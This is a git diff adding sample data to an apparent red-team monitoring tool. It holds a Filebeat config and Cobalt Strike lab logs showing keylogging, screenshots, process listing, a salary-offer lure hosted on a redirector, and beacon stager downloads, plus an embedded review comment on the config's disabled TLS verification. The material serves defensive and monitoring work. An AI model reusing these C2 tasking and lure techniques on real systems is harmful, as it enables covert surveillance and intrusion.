diff --git a/elkserver/mounts/sample-data/filebeat.yml b/elkserver/mounts/sample-data/filebeat.yml
new file mode 100644
index 00000000..cf1eda27
--- /dev/null
+++ b/elkserver/mounts/sample-data/filebeat.yml
@@ -0,0 +1,179 @@
+filebeat.inputs:
+
+# BEGIN REDIRECTORS CONFIG
+- type: log
+ enabled: true
+ fields_under_root: true
+ paths:
+ - /var/log/sample-data/haproxy.log
+ fields:
+ infra:
+ log:
+ type: redirtraffic
+ redir:
+ program: haproxy
+- type: log
+ enabled: true
+ fields_under_root: true
+ paths:
+ - /var/log/sample-data/apache2.log
+ fields:
+ infra:
+ log:
+ type: redirtraffic
+ redir:
+ program: apache
+- type: log
+ enabled: true
+ fields_under_root: true
+ paths:
+ - /var/log/sample-data/nginx.log
+ fields:
+ infra:
+ log:
+ type: redirtraffic
+ redir:
+ program: nginx
+# END REDIRECTORS CONFIG
+
+# BEGIN COBALT STRIKE CONFIG
+- type: log
+ scan_frequency: 5s
+ enabled: true
+ fields_under_root: true
+ paths:
+ - /var/log/sample-data/cobaltstrike/logs/*/events.log
+ fields:
+ infra:
+ log:
+ type: rtops
+ c2:
+ program: cobaltstrike
+ log:
+ type: events
+
+- type: log
+ scan_frequency: 5s
+ enabled: true
+ fields_under_root: true
+ paths:
+ - /var/log/sample-data/cobaltstrike/logs/*/weblog.log
+ fields:
+ infra:
+ log:
+ type: rtops
+ c2:
+ program: cobaltstrike
+ log:
+ type: weblog
+
+- type: log
+ scan_frequency: 5s
+ enabled: true
+ fields_under_root: true
+ paths:
+ - /var/log/sample-data/cobaltstrike/logs/*/downloads.log
+ fields:
+ infra:
+ log:
+ type: rtops
+ c2:
+ program: cobaltstrike
+ log:
+ type: downloads
+
+- type: log
+ scan_frequency: 5s
+ enabled: true
+ fields_under_root: true
+ paths:
+ - /var/log/sample-data/cobaltstrike/data/export_credentials.tsv
+ fields:
+ infra:
+ log:
+ type: rtops
+ c2:
+ program: cobaltstrike
+ log:
+ type: credentials
+
+- type: log
+ scan_frequency: 5s
+ enabled: true
+ fields_under_root: true
+ paths:
+ - /var/log/sample-data/cobaltstrike/logs/*/*/beacon_*.log
+ - /var/log/sample-data/cobaltstrike/logs/*/*/ssh_*.log
+ # Since Cobalt Strike version 3.14 the time format in the logs is changed. Here we use regex 'or' function (expr1)|(expr2) to match new or old format
+ multiline.pattern: '(^\d\d\/\d\d\s\d\d\:\d\d\:\d\d\sUTC\s\[)|(^\d\d\/\d\d\s\d\d\:\d\d\:\d\d\s\[)' # match "06/19 12:32:56 UTC [" or "06/19 12:32:56 ["
+ multiline.negate: true
+ multiline.match: after
+ multiline.max_lines: 100000
+ fields:
+ infra:
+ log:
+ type: rtops
+ c2:
+ program: cobaltstrike
+ log:
+ type: beacon
+
+- type: log
+ scan_frequency: 5s
+ enabled: true
+ fields_under_root: true
+ paths:
+ - /var/log/sample-data/cobaltstrike/logs/*/*/keystrokes/keystrokes_*.txt
+ # Since Cobalt Strike version 3.14 the time format in the logs is changed. Here we use regex 'or' function (expr1)|(expr2) to match new or old format
+ multiline.pattern: '(^\d\d\/\d\d\s\d\d\:\d\d\:\d\d\sUTC\s\[)|(^\d\d\/\d\d\s\d\d\:\d\d\:\d\d\s\[)' # match "06/19 12:32:56 UTC [" or "06/19 12:32:56 ["
+ multiline.negate: true
+ multiline.match: after
+ multiline.max_lines: 100000
+ fields:
+ infra:
+ log:
+ type: rtops
+ c2:
+ program: cobaltstrike
+ log:
+ type: keystrokes
+
+- type: log
+ scan_frequency: 5s
+ enabled: true
+ fields_under_root: true
+ paths:
+ - /var/log/sample-data/cobaltstrike/logs/*/*/screenshots.log
+ # Since Cobalt Strike version 3.14 the time format in the logs is changed. Here we use regex 'or' function (expr1)|(expr2) to match new or old format
+ multiline.pattern: '(^\d\d\/\d\d\s\d\d\:\d\d\:\d\d\sUTC\s\[)|(^\d\d\/\d\d\s\d\d\:\d\d\:\d\d\s\[)' # match "06/19 12:32:56 UTC [" or "06/19 12:32:56 ["
+ multiline.negate: true
+ multiline.match: after
+ multiline.max_lines: 100000
+ fields:
+ infra:
+ log:
+ type: rtops
+ c2:
+ program: cobaltstrike
+ log:
+ type: screenshots
+
+# END COBALT STRIKE CONFIG
+
+filebeat.config.modules:
+ path: ${path.config}/modules.d/*.yml
+ reload.enabled: false
+
+setup.template.settings:
+ index.number_of_shards: 3
+
+name: "sample-client"
+fields_under_root: true
+fields:
+ infra:
+ attack_scenario: sample-scenario
+
+output.logstash:
+ hosts: ["redelk-logstash:5044"]
+ ssl.certificate_authorities: ["/usr/share/filebeat/redelkCA.crt"]
+ ssl.verification_mode: none
diff --git a/elkserver/mounts/sample-data/logs/apache2.log b/elkserver/mounts/sample-data/logs/apache2.log
new file mode 100644
index 00000000..e69de29b
diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/beacon_1233239984.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/beacon_1233239984.log
new file mode 100644
index 00000000..e5dfeb7e
--- /dev/null
+++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/beacon_1233239984.log
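Review bot: The weblog input path `/var/log/sample-data/cobaltstrike/logs/*/weblog.log` does not match the weblog sample this commit adds as `logs/200329/weblog_80.log`, so that sample is never shipped; `- /var/log/sample-data/cobaltstrike/logs/*/weblog*.log` would cover the per-port file name. `ssl.verification_mode: none` on `output.logstash` disables server certificate verification, which makes the mounted `/usr/share/filebeat/redelkCA.crt` in `ssl.certificate_authorities` ineffective and delivers the beacon, keystroke and exported-credential logs to whatever presents itself as `redelk-logstash:5044`; `ssl.verification_mode: full` would use that CA, or a comment should record why verification is off for the sample client. The same multiline block and its `# Since Cobalt Strike version 3.14 ...` comment are repeated verbatim for the beacon, keystrokes and screenshots inputs; one comment above `# BEGIN COBALT STRIKE CONFIG` stating that all three share the pattern would keep them from drifting apart.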
@@ -0,0 +1,53 @@
+03/29 15:18:46 UTC [metadata] 13.80.254.1 <- 10.99.1.4; computer: LabMaster; user: outflank *; process: testbeacon.exe; pid: 2004; os: Windows; version: 6.2; beacon arch: x64 (x64)
+03/29 15:19:00 UTC [input] upload
+03/29 15:19:15 UTC [input] pwd
+03/29 15:19:15 UTC [task] <> Tasked beacon to print working directory
+03/29 15:19:19 UTC [checkin] host called home, sent: 8 bytes
+03/29 15:19:20 UTC [output]
+Current directory is C:\Users\outflank\Desktop
+
+03/29 15:19:39 UTC [input] cd \windows\temp
+03/29 15:19:39 UTC [task] <> cd \windows\temp
+03/29 15:19:39 UTC [checkin] host called home, sent: 21 bytes
+03/29 15:19:40 UTC [input] pwd
+03/29 15:19:40 UTC [task] <> Tasked beacon to print working directory
+03/29 15:19:43 UTC [checkin] host called home, sent: 8 bytes
+03/29 15:19:43 UTC [output]
+Current directory is C:\windows\temp
+
+03/29 15:19:49 UTC [input] upload
+03/29 15:19:56 UTC [task] <> Tasked beacon to upload C:\Users\outflank\Desktop\OfferNr2020F6592_salary.doc as OfferNr2020F6592_salary.doc
+03/29 15:19:56 UTC [indicator] file: f06d1ae4cbde03cde3898f05b841850f 150016 bytes OfferNr2020F6592_salary.doc
+03/29 15:19:58 UTC [checkin] host called home, sent: 150055 bytes
+03/29 15:20:21 UTC [input] ls
+03/29 15:20:21 UTC [task] <> Tasked beacon to list files in .
+03/29 15:20:21 UTC [checkin] host called home, sent: 19 bytes
+03/29 15:20:21 UTC [output]
+C:\windows\temp\*
+D 0 03/29/2020 15:20:01 .
+D 0 03/29/2020 15:20:01 ..
+D 0 03/29/2020 11:18:45 C4663637-44E3-43AA-9240-B6235C0B5998-Sigs
+F 33311 03/29/2020 09:50:19 chrome_installer.log
+D 0 03/29/2020 09:37:54 Crashpad
+F 0 03/29/2020 09:27:39 DMI6A08.tmp
+D 0 03/29/2020 09:43:18 hsperfdata_LabMaster$
+F 0 03/29/2020 11:24:19 LabMaster-20200329-1124.log
+F 8670 03/29/2020 11:25:55 LabMaster-20200329-1125.log
+F 14480 03/29/2020 11:25:59 LabMaster-20200329-1125a.log
+F 11410 03/29/2020 11:25:59 LabMaster-20200329-1125b.log
+F 32790 03/29/2020 11:26:29 LabMaster-20200329-1126.log
+F 10400 03/29/2020 11:18:45 MpCmdRun.log
+F 18736 03/29/2020 11:18:45 MpSigStub.log
+F 150016 03/29/2020 15:19:58 OfferNr2020F6592_salary.doc
+F 0 03/29/2020 11:24:19 officeclicktorun.exe_streamserver(202003291124191078).log
+F 102 03/29/2020 09:17:42 silconfig.log
+D 0 03/29/2020 09:18:28 winrmdone
+D 0 03/29/2020 09:18:24 winrmrunning
+
+
+03/29 15:29:24 UTC [input] exit
+03/29 15:29:24 UTC [task] <> Tasked beacon to exit
+03/29 15:29:28 UTC [checkin] host called home, sent: 8 bytes
+03/29 15:29:28 UTC [output]
+beacon exit.
+
diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/beacon_2019412980.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/beacon_2019412980.log
new file mode 100644
index 00000000..796b411b
--- /dev/null
+++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/beacon_2019412980.log
@@ -0,0 +1,95 @@
+03/29 14:54:56 UTC [metadata] 13.80.254.1 <- 10.99.1.4; computer: LabMaster; user: outflank *; process: rundll32.exe; pid: 3568; os: Windows; version: 10.0; beacon arch: x86 (x64)
+03/29 15:00:18 UTC [input] ps
+03/29 15:00:18 UTC [task] Tasked beacon to list processes
+03/29 15:00:22 UTC [checkin] host called home, sent: 12 bytes
+03/29 15:00:22 UTC [output]
+[System Process] 0 0
+System 0 4 x64 0
+smss.exe 4 304 x64 NT AUTHORITY\SYSTEM 0
+csrss.exe 416 428
+wininit.exe 416 492 x64 NT AUTHORITY\SYSTEM 0
+csrss.exe 484 500
+winlogon.exe 484 552 x64 NT AUTHORITY\SYSTEM 1
+services.exe 492 620 x64 NT AUTHORITY\SYSTEM 0
+lsass.exe 492 628 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 620 720 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 620 764 x64 NT AUTHORITY\NETWORK SERVICE 0
+svchost.exe 620 876 x64 NT AUTHORITY\SYSTEM 0
+dwm.exe 552 908
+svchost.exe 620 956 x64 NT AUTHORITY\LOCAL SERVICE 0
+svchost.exe 620 1008 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 620 1408 x64 NT AUTHORITY\LOCAL SERVICE 0
+svchost.exe 620 1416 x64 NT AUTHORITY\LOCAL SERVICE 0
+svchost.exe 620 1560 x64 NT AUTHORITY\NETWORK SERVICE 0
+svchost.exe 620 1700 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 620 1840 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 620 2016 x64 NT AUTHORITY\LOCAL SERVICE 0
+VSSVC.exe 620 2024 x64 NT AUTHORITY\SYSTEM 0
+spoolsv.exe 620 1168 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 620 1360 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 620 1960 x64 NT AUTHORITY\SYSTEM 0
+MsMpEng.exe 620 1988 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 620 2436 x64 NT AUTHORITY\NETWORK SERVICE 0
+WaAppAgent.exe 620 3244 x64 NT AUTHORITY\SYSTEM 0
+LogonUI.exe 552 3412 x64 NT AUTHORITY\SYSTEM 1
+rundll32.exe 876 3656 x64 NT AUTHORITY\SYSTEM 0
+rundll32.exe 876 3772 x64 NT AUTHORITY\SYSTEM 0
+WindowsAzureTelemetryService.exe 620 3980 x64 NT AUTHORITY\SYSTEM 0
+WindowsAzureGuestAgent.exe 620 2384 x64 NT AUTHORITY\SYSTEM 0
+WaSecAgentProv.exe 3244 688 x64 NT AUTHORITY\SYSTEM 0
+conhost.exe 688 3900 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 620 1504 x64 NT AUTHORITY\NETWORK SERVICE 0
+msdtc.exe 620 2236 x64 NT AUTHORITY\NETWORK SERVICE 0
+WindowsAzureNetAgent.exe 620 3896 x64 NT AUTHORITY\SYSTEM 0
+VFPlugin.exe 3896 2932 x64 NT AUTHORITY\SYSTEM 0
+conhost.exe 2932 3576 x64 NT AUTHORITY\SYSTEM 0
+csrss.exe 440 1312
+winlogon.exe 440 2980 x64 NT AUTHORITY\SYSTEM 2
+dwm.exe 2980 1288
+rdpclip.exe 2436 2920 x64 LabMaster\outflank 2
+RuntimeBroker.exe 720 808 x64 LabMaster\outflank 2
+sihost.exe 876 2368 x64 LabMaster\outflank 2
+explorer.exe 2136 3636 x64 LabMaster\outflank 2
+svchost.exe 620 2632 x64 LabMaster\outflank 2
+taskhostw.exe 876 3368 x64 LabMaster\outflank 2
+ShellExperienceHost.exe 720 4664 x64 LabMaster\outflank 2
+SearchUI.exe 720 4760 x64 LabMaster\outflank 2
+powershell.exe 808 3084 x64 LabMaster\outflank 2
+conhost.exe 3084 4844 x64 LabMaster\outflank 2
+svchost.exe 620 3812 x64 NT AUTHORITY\LOCAL SERVICE 0
+taskhostw.exe 876 5548 x64 LabMaster\outflank 2
+OfficeClickToRun.exe 620 4216 x64 NT AUTHORITY\SYSTEM 0
+fontdrvhost.exe 2980 4908
+AppVShNotify.exe 4216 2172 x64 LabMaster\outflank 2
+mstsc.exe 3636 2196 x64 LabMaster\outflank 2
+mstsc.exe 3636 4900 x64 LabMaster\outflank 2
+javaw.exe 3272 3832 x64 LabMaster\outflank 2
+testbeacon.exe 3636 3324 x64 LabMaster\outflank 2
+testbeacon-longhaul.exe 3636 5792 x64 LabMaster\outflank 2
+notepad.exe 3636 4804 x64 LabMaster\outflank 2
+chrome.exe 808 1060 x64 LabMaster\outflank 2
+chrome.exe 1060 2888 x64 LabMaster\outflank 2
+chrome.exe 1060 4640 x64 LabMaster\outflank 2
+chrome.exe 1060 4240 x64 LabMaster\outflank 2
+chrome.exe 1060 5788 x64 LabMaster\outflank 2
+chrome.exe 1060 4052 x64 LabMaster\outflank 2
+WmiPrvSE.exe 720 5300
+chrome.exe 1060 5380 x64 LabMaster\outflank 2
+chrome.exe 1060 2508 x64 LabMaster\outflank 2
+WINWORD.EXE 5648 5096 x86 LabMaster\outflank 2
+rundll32.exe 5096 3568 x86 LabMaster\outflank 2
+WmiPrvSE.exe 720 2868
+
+
+03/29 15:00:35 UTC [input] screenshot
+03/29 15:00:35 UTC [task] Tasked beacon to take screenshot
+03/29 15:00:36 UTC [checkin] host called home, sent: 162370 bytes
+03/29 15:00:37 UTC [output]
+received screenshot (253367 bytes)
+
+03/29 15:01:00 UTC [input] exit
+03/29 15:01:00 UTC [task] <> Tasked beacon to exit
+03/29 15:01:01 UTC [checkin] host called home, sent: 8 bytes
+03/29 15:01:01 UTC [output]
+beacon exit.
+
diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/beacon_496538698.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/beacon_496538698.log
new file mode 100644
index 00000000..70cfcd58
--- /dev/null
+++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/beacon_496538698.log
@@ -0,0 +1,34 @@
+03/29 13:16:36 UTC [metadata] 13.80.254.1 <- 10.99.1.4; computer: LabMaster; user: outflank *; process: testbeacon.exe; pid: 3324; os: Windows; version: 6.2; beacon arch: x64 (x64)
+03/29 13:26:57 UTC [input] screenshot
+03/29 13:26:57 UTC [task] Tasked beacon to take screenshot
+03/29 13:27:01 UTC [checkin] host called home, sent: 197186 bytes
+03/29 13:27:02 UTC [output]
+received screenshot (166469 bytes)
+
+03/29 13:54:31 UTC [input] keylogger
+03/29 13:54:31 UTC [task] Tasked beacon to log keystrokes
+03/29 13:54:35 UTC [checkin] host called home, sent: 81474 bytes
+03/29 13:55:09 UTC [output]
+received keystrokes
+
+03/29 13:55:18 UTC [output]
+received keystrokes
+
+03/29 13:55:34 UTC [input] jobkill
+03/29 13:55:34 UTC [error] jobkill error: not enough arguments
+03/29 13:55:36 UTC [input] jobs
+03/29 13:55:36 UTC [task] <> Tasked beacon to list jobs
+03/29 13:55:37 UTC [checkin] host called home, sent: 8 bytes
+03/29 13:55:37 UTC [output]
+1 0 keystroke logger
+
+
+03/29 13:55:42 UTC [input] jobkill 1
+03/29 13:55:42 UTC [task] <> Tasked beacon to kill job 1
+03/29 13:55:42 UTC [checkin] host called home, sent: 10 bytes
+03/29 15:01:06 UTC [input] exit
+03/29 15:01:06 UTC [task] <> Tasked beacon to exit
+03/29 15:01:08 UTC [checkin] host called home, sent: 8 bytes
+03/29 15:01:08 UTC [output]
+beacon exit.
+
diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/keystrokes/keystrokes_496538698.txt b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/keystrokes/keystrokes_496538698.txt
new file mode 100644
index 00000000..afeebbfb
--- /dev/null
+++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/keystrokes/keystrokes_496538698.txt
@@ -0,0 +1,23 @@ +03/29 13:55:09 UTC Received keystrokes + + + +CCobalt Strike +E======= +r2[command] + +CRun +E======= +notepad + +C +E======= + + + +CUntitled - Notepad +E======= +test for keylogger +03/29 13:55:18 UTC Received keystrokes + + - hello :-) diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/screenshots/screen_012702_496538698.jpg b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/screenshots/screen_012702_496538698.jpg new file mode 100644 index 00000000..9c65cd7a Binary files /dev/null and b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/screenshots/screen_012702_496538698.jpg differ diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/screenshots/screen_030037_2019412980.jpg b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/screenshots/screen_030037_2019412980.jpg new file mode 100644 index 00000000..200c496c Binary files /dev/null and b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/10.99.1.4/screenshots/screen_030037_2019412980.jpg differ diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/events.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/events.log new file mode 100644 index 00000000..0bbac085 --- /dev/null +++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/events.log 
@@ -0,0 +1,14 @@
+03/29 12:29:29 UTC *** MarcS joined
+03/29 13:16:31 UTC *** initial beacon from outflank *@10.99.1.4 (LabMaster)
+03/29 13:54:14 UTC *** neo joined
+03/29 14:13:46 UTC *** neo quit
+03/29 14:37:25 UTC *** neo joined
+03/29 14:48:36 UTC *** MarcS hosted file /root/cobaltstrike/uploads/OfferNr2020F6592_salary.doc @ http://redira1.totallynotavirus.nl:80/downloaddoc.php?f=56893
+03/29 14:54:21 UTC *** MarcS hosted file /root/cobaltstrike/uploads/OfferNr2020F6592_salary.doc @ http://redira1.totallynotavirus.nl:80/download/doc56893
+03/29 14:54:49 UTC *** initial beacon from outflank *@10.99.1.4 (LabMaster)
+03/29 15:12:10 UTC *** MarcS quit
+03/29 15:12:28 UTC *** neo quit
+03/29 15:12:49 UTC *** neo joined
+03/29 15:14:07 UTC *** MarcS joined
+03/29 15:18:37 UTC *** initial beacon from outflank *@10.99.1.4 (LabMaster)
+03/29 16:04:01 UTC *** MarcS quit
diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/weblog_80.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/weblog_80.log
new file mode 100644
index 00000000..44167146
--- /dev/null
+++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200329/weblog_80.log
@@ -0,0 +1,34 @@
+13.80.254.1 unknown unknown [03/29 13:16:30 UTC] "GET /JEWw/" 200 260679 "beacon beacon stager x64" "Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
+171.67.70.85 unknown unknown [03/29 13:21:27 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x"
+94.183.49.72 unknown unknown [03/29 13:33:11 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
+110.249.212.46 unknown unknown [03/29 14:36:06 UTC] "GET http://110.249.212.46/testget" 404 0 "" "null"
+110.249.212.46 unknown unknown [03/29 14:36:06 UTC] "GET http://110.249.212.46/testget" 404 0 "" "null"
+13.80.254.1 unknown unknown [03/29 14:49:03 UTC] "GET /downloaddoc.php" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
+13.80.254.1 unknown unknown [03/29 14:49:59 UTC] "GET /downloaddoc.php" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
+13.80.254.1 unknown unknown [03/29 14:50:22 UTC] "GET /downloaddoc.php" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
+13.80.254.1 unknown unknown [03/29 14:54:32 UTC] "GET /download/doc56893" 200 150016 "page Serves /root/cobaltstrike/uploads/OfferNr2020F6592_salary.doc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
+13.80.254.1 unknown unknown [03/29 14:54:49 UTC] "GET /zcF9/" 200 208983 "beacon beacon stager x86" "Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
+169.197.108.38 unknown unknown [03/29 15:18:08 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
+13.80.254.1 unknown unknown [03/29 15:18:37 UTC] "GET /JEWw/" 200 260679 "beacon beacon stager x64" "Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
+10.1.3.10 unknown unknown [03/29 15:33:48 UTC] "GET /download/doc56893" 200 150016 "page Serves /root/cobaltstrike/uploads/OfferNr2020F6592_salary.doc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
+37.235.156.98 unknown unknown [03/29 15:48:49 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
+173.48.25.25 unknown unknown [03/29 17:31:01 UTC] "GET /" 404 0 "" "null"
+213.136.69.132 unknown unknown [03/29 17:41:17 UTC] "GET /TP/public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
+213.136.69.132 unknown unknown [03/29 17:41:17 UTC] "GET /TP/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
+213.136.69.132 unknown unknown [03/29 17:41:17 UTC] "GET /thinkphp/html/public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
+213.136.69.132 unknown unknown [03/29 17:41:17 UTC] "GET /html/public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
+213.136.69.132 unknown unknown [03/29 17:41:17 UTC] "GET /public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
+213.136.69.132 unknown unknown [03/29 17:41:17 UTC] "GET /TP/html/public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
+213.136.69.132 unknown unknown [03/29 17:41:17 UTC] "GET /elrekt.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
+213.136.69.132 unknown unknown [03/29 17:41:17 UTC] "GET /index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
+213.136.69.132 unknown unknown [03/29 17:41:17 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
+178.73.215.171 unknown unknown [03/29 18:24:30 UTC] "GET /" 404 0 "" "null"
+192.241.237.107 unknown unknown [03/29 18:52:52 UTC] "GET /hudson" 404 0 "" "Mozilla/5.0 zgrab/0.x"
+171.67.70.85 unknown unknown [03/29 18:59:56 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x"
+208.91.109.90 unknown unknown [03/29 19:20:47 UTC] "HEAD /robots.txt" 404 0 "" "null"
+94.140.114.53 unknown unknown [03/29 19:26:19 UTC] "GET /" 404 0 "" "Pandalytics/1.0 (https://domainsbot.com/pandalytics/)"
+110.77.180.234 unknown unknown [03/29 20:39:29 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
+176.104.243.33 unknown unknown [03/29 20:46:39 UTC] "GET /" 404 0 "" "null"
+41.57.104.224 unknown unknown [03/29 22:30:54 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
+177.45.130.136 unknown unknown [03/29 22:56:03 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
+5.196.65.217 unknown unknown [03/29 22:58:35 UTC] "GET /" 404 0 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.2.10/beacon_455228.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.2.10/beacon_455228.log
new file mode 100644
index 00000000..ed972380
--- /dev/null
+++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.2.10/beacon_455228.log
@@ -0,0 +1,4 @@
+03/30 09:10:57 UTC [metadata] beacon_22170412 -> 10.1.2.10; computer: S-WIN21; user: ADMIN-W.Trommel *; process: wsmprovhost.exe; pid: 2476; os: Windows; version: 6.3; beacon arch: x64 (x64)
+03/30 09:10:51 UTC [output]
+established link to parent beacon: 10.1.4.10
+
diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/beacon_358093816.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/beacon_358093816.log
new file mode 100644
index 00000000..3e4f1574
--- /dev/null
+++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/beacon_358093816.log
@@ -0,0 +1,2357 @@ +03/30 08:41:27 UTC [metadata] 13.81.175.116 <- 10.1.3.10; computer: L-WIN223; user: w.tax; process: mousedrivercontrol.exe; pid: 5192; os: Windows; version: 6.2; beacon arch: x64 (x64) +03/30 08:42:36 UTC [input] ps +03/30 08:42:36 UTC [task] Tasked beacon to list processes +03/30 08:42:39 UTC [checkin] host called home, sent: 12 bytes +03/30 08:42:39 UTC [output] +[System Process] 0 0 +System 0 4 +Registry 4 88 +smss.exe 4 404 +csrss.exe 504 512 +wininit.exe 504 588 +csrss.exe 580 596 +winlogon.exe 580 684 +services.exe 588 700 +lsass.exe 588 732 +svchost.exe 700 832 +fontdrvhost.exe 588 844 +fontdrvhost.exe 684 856 +svchost.exe 700 920 +svchost.exe 700 972 +svchost.exe 700 1016 +LogonUI.exe 684 600 +dwm.exe 684 652 +svchost.exe 700 1032 +svchost.exe 700 1040 +svchost.exe 700 1096 +svchost.exe 700 1104 +svchost.exe 700 1144 +svchost.exe 700 1176 +svchost.exe 700 1236 +svchost.exe 700 1264 +svchost.exe 700 1300 +svchost.exe 700 1364 +svchost.exe 700 1400 +svchost.exe 700 1444 +svchost.exe 700 1452 +svchost.exe 700 1572 +svchost.exe 700 1588 +svchost.exe 700 1620 +svchost.exe 700 1712 +svchost.exe 700 1768 +svchost.exe 700 1792 +svchost.exe 700 1824 +svchost.exe 700 1840 +svchost.exe 700 1880 +svchost.exe 700 1944 +svchost.exe 700 1972 +svchost.exe 700 1980 +svchost.exe 700 2000 +svchost.exe 700 2028 +VSSVC.exe 700 2152 +Memory Compression 4 2204 +svchost.exe 700 2224 +svchost.exe 700 2252 +svchost.exe 700 2300 +svchost.exe 700 2352 +svchost.exe 700 2388 +svchost.exe 700 2496 +svchost.exe 700 2524 +svchost.exe 700 2604 +svchost.exe 700 2612 +svchost.exe 700 2712 +svchost.exe 700 2764 +svchost.exe 700 2816 +svchost.exe 700 2828 +svchost.exe 700 2912 +spoolsv.exe 700 2972 +svchost.exe 700 3024 